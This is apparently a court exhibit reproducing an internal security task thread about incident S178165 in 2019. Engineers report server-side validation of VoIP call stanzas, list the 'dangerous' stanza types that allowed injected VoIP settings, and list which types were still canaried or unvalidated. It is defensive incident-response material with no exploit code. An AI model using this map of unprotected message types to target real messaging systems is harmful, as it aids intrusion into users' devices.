**Aby John** marked this task as blocking T44191245: Master task for SEV S178165

May 9, 2019

**Claudiu Gheorghe** marked this task as not depending on T44019656: log all the large RTCP packets in edgeray, T44019169: log all the packets from particular JIDs for investigation, T44020654: collect all the numbers affected by S178165 and T44020385: crashlog: find similar crashes from S178165 in the past

May 9, 2019

 **Claudiu Gheorghe** to give an update on this one, we have most of the stanza validation pushed, and the server is here as well. Jesus - can you clarify which is the diff considered "the fix" now and what's the method of enabling the fix?

May 9, 2019 · Like · Reply

**Xi Deng** added attachment     whatsapp-2019-05-07.1….

May 9, 2019

 **Xi Deng**

May 9, 2019 · Like · Reply

 **Jesus Barcons Palau**

Once chatd deployment is completed, we'll have validation for the following stanzas:

https://www.internalfb.com/intern/tasks/?t=34775320                                                                                    19/22

Highly Confidential - Attorneys' Eyes Only                                                                                    WA-NSO-00017601

PTX-0013.0019

- audio_video_switch
- call_offer
- call_accept
- direct_group_call_offer
- enc_rekey
- group_call_offer
- relaylatency

When we enable blocking, the above stanzas will be dropped and the sender will receive an error.  These stanzas include the "dangerous" ones, since they allow to inject voip settings that the receiver can consume.

The following stanzas are currently being "canaried".  They bump counters and are being logged, but will not be dropped since we don't have full confidence yet:

- interruption
- mute
- notify
- relayelection
- transport
- flowcontrol
- preaccept

The remaining stanzas to be validated are:

- terminate
- group call accept
- group call receipt
- group call reject
- group call terminate
- group call peer state
- group call preaccept

- group call mute
- group call ???

We'll continue working on it so we have validation for all of them.  Maybe I'm missing some stanzas, we'll count what we are missing once we have validation for all of the above.

May 9, 2019 · Like ·        6 · Reply

https://www.internalfb.com/intern/tasks/?t=34775320

Highly Confidential - Attorneys' Eyes Only

WA-NSO-00017602

PTX-0013.0020

**Jesus Barcons Palau** made several changes

May 13, 2019

added D15306712: Also log to Scuba UUID of call offer that fails validation.

added D15321226: [voip_validation] Promoting some stanza validation from ?IN_PROGRESS to ?CHECKED.

added D15332007: [chatd_c2s] Also log to Scuba VoIP stanzas that are sent by emulators.

Hide all changes...

**Claudiu Gheorghe** subscribed Edward George

May 22, 2019

**Claudiu Gheorghe** closed the task and made several other changes

May 23, 2019

changed the progress from `In Progress` to `Closed`

closed the task

Hide all changes...

 **Claudiu Gheorghe** nothing left here to be done except finishing up the stanza validation which is tracked here: https://our.intern.facebook.com/intern/tasks/?t=44847508

May 23, 2019 · Like · Reply

Paul Otto, Elly Bingaman and Carl Woog were subscribed

June 20, 2019

Otto Ebeling subscribed Carl Woog

Tiana Demas subscribed Paul Otto

Tiana Demas subscribed Elly Bingaman

Hide all changes...

**Claudiu Gheorghe** subscribed Michael Kearney

June 27, 2019

**Tiana Demas** subscribed Chris Puntarelli

October 22, 2019

 **SEV Manager** "IM Review Action Item" tag has been re-added since this task is still associated with S178165. If this task is no longer related to this SEV, please unmark it from SEV Manager before removing the tag."

September 23, 10:50 AM · Like · Reply

**SEV Manager** made several changes

September 23, 10:50 AM

Highly Confidential - Attorneys' Eyes Only                                                                          WA-NSO-00017603

PTX-0013.0021

added tag  SEV Task

added tag  SEV Task

**Hide all changes...**

SEV Manager was subscribed

September 23, 10:50 AM

    **SEV Manager** subscribed SEV Manager

    **SEV Manager** subscribed SEV Manager

**Hide all changes...**

 **SEV Manager** "IM Review Action Item" tag has been re-added since this task is still associated with S178165. If this task is no longer related to this SEV, please unmark it from SEV Manager before removing the tag."

September 23, 10:50 AM · Like · Reply

**Jesus Barcons Palau** subscribed Patrick Jette

3 hrs

Highly Confidential - Attorneys' Eyes Only

WA-NSO-00017604

PTX-0013.0022